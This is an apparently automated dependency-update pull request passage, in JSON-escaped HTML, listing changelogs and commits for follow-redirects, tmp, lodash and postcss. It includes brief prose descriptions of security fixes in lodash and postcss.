href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/21ef28a544c5e57f4c34b8476d75f2144609a1eb\"\u003e\u003ccode\u003e21ef28a\u003c/code\u003e\u003c/a\u003e Release version 1.15.11 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7c88135da3bd0681a7e156ee66b16b2f6f98b480\"\u003e\u003ccode\u003e7c88135\u003c/code\u003e\u003c/a\u003e Roll back tree shaking.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/6e389ba094beec211a8847788a146917a16c1bdb\"\u003e\u003ccode\u003e6e389ba\u003c/code\u003e\u003c/a\u003e Release version 1.15.10 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5bc496e0229abda823221e0c6267926a3f93f262\"\u003e\u003ccode\u003e5bc496e\u003c/code\u003e\u003c/a\u003e Shake me up before you go-go.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/694d6b47a42bc8377e5ef1480394de451e16bd5b\"\u003e\u003ccode\u003e694d6b4\u003c/code\u003e\u003c/a\u003e Bump minimist from 1.2.5 to 1.2.8\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.3...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tmp` from 0.2.1 to 0.2.7\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/raszi/node-tmp/blob/master/CHANGELOG.md\"\u003etmp's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.2.2 (2024-02-28)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/278\"\u003e#278\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/268\"\u003e#268\u003c/a\u003e: Revert \u0026quot;fix \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/246\"\u003e#246\u003c/a\u003e: remove any double quotes or single quotes… (\u003ca href=\"https://github.com/mbargiel\"\u003e\u003ccode\u003e@​mbargiel\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:memo: Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/279\"\u003e#279\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/266\"\u003e#266\u003c/a\u003e: move paragraph on graceful cleanup to the head of the documentation (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 5\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eCarsten Klein (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDave Nicolson (\u003ca href=\"https://github.com/dnicolson\"\u003e\u003ccode\u003e@​dnicolson\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKARASZI István (\u003ca href=\"https://github.com/raszi\"\u003e\u003ccode\u003e@​raszi\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMaxime Bargiel (\u003ca href=\"https://github.com/mbargiel\"\u003e\u003ccode\u003e@​mbargiel\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/robertoaceves\"\u003e\u003ccode\u003e@​robertoaceves\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/8ea1f37d75c67569e0f151448330d52f7babf211\"\u003e\u003ccode\u003e8ea1f37\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/8f24f788a356b5d45c9bec894632bd4931338153\"\u003e\u003ccode\u003e8f24f78\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/ce787f37aaacccad921ae90990c9da33481fe59c\"\u003e\u003ccode\u003ece787f3\u003c/code\u003e\u003c/a\u003e Reject non-string prefix, postfix, template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/41f71598d03f104a67e0448a7cb9bd4efcdd5980\"\u003e\u003ccode\u003e41f7159\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/efa4a06f24374797ae32ab2b6ae39b7a611ae429\"\u003e\u003ccode\u003eefa4a06\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/7ef2728ce0211b8110b2033dfe62eaf030341acf\"\u003e\u003ccode\u003e7ef2728\u003c/code\u003e\u003c/a\u003e Check for relative values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/3d2fe387f3f91b13830b9182faa02c3231ea8258\"\u003e\u003ccode\u003e3d2fe38\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/e16282879e5d0554fe824e1ab3df724847e91183\"\u003e\u003ccode\u003ee162828\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/309\"\u003e#309\u003c/a\u003e from fflorent/fix-tmp-dir-with-dir\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/b847d2f1a42b625c26149f4a2029ed00a1edf90b\"\u003e\u003ccode\u003eb847d2f\u003c/code\u003e\u003c/a\u003e Fix use of tmp.dir() with \u003ccode\u003edir\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/08fa3abac32b621506512724b28b56b9c4a95846\"\u003e\u003ccode\u003e08fa3ab\u003c/code\u003e\u003c/a\u003e Update version\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/raszi/node-tmp/compare/v0.2.1...v0.2.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.21 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.21...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `postcss` from 8.4.27 to 8.5.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/releases\"\u003epostcss's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed declaration parsing performance (by \u003ca href=\"https://github.com/homanp\"\u003e\u003ccode\u003e@​homanp\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed custom syntax regression (by \u003ca href=\"https://github.com/43081j\"\u003e\u003ccode\u003e@​43081j\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epostcss-scss\u003c/code\u003e commend regression.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed reading any file via user-generated CSS.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eopts.unsafeMap\u003c/code\u003e to disable checks.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed nested brackets parsing performance (by \u003ca href=\"https://github.com/offset\"\u003e\u003ccode\u003e@​offset\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded more details to \u003ccode\u003eUnknown word\u003c/code\u003e error (by \u003ca href=\"https://github.com/hiepxanh\"\u003e\u003ccode\u003e@​hiepxanh\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed types (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed docs (by \u003ca href=\"https://github.com/catnipan\"\u003e\u003ccode\u003e@​catnipan\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed end position of rules with semicolon (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed backwards compatibility for complex cases (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5 “Duke Alloces”\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/blob/main/CHANGELOG.md\"\u003epostcss's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed declaration parsing performance (by \u003ca href=\"https://github.com/homanp\"\u003e\u003ccode\u003e@​homanp\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed custom syntax regression (by \u003ca href=\"https://github.com/43081j\"\u003e\u003ccode\u003e@​43081j\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epostcss-scss\u003c/code\u003e commend regression.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed reading any file via user-generated CSS.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eopts.unsafeMap\u003c/code\u003e to disable checks.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed nested brackets parsing performance (by \u003ca href=\"https://github.com/offset\"\u003e\u003ccode\u003e@​offset\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/eae46db765d752cf8f40c4fa2b0b85030079c43d\"\u003e\u003ccode\u003eeae46db\u003c/code\u003e\u003c/a\u003e Release 8.5.15 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/79508ffa59e42c02056aca61b88bc393c8b516c4\"\u003e\u003ccode\u003e79508ff\u003c/code\u003e\u003c/a\u003e Update CI actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/b128e2131288a411c6e28071d0929542c49e74eb\"\u003e\u003ccode\u003eb128e21\u003c/code\u003e\u003c/a\u003e Speed up declaration parsing by avoiding creating new array on each token\u003c/li\u003e\n\u003cli\u003e\u003ca 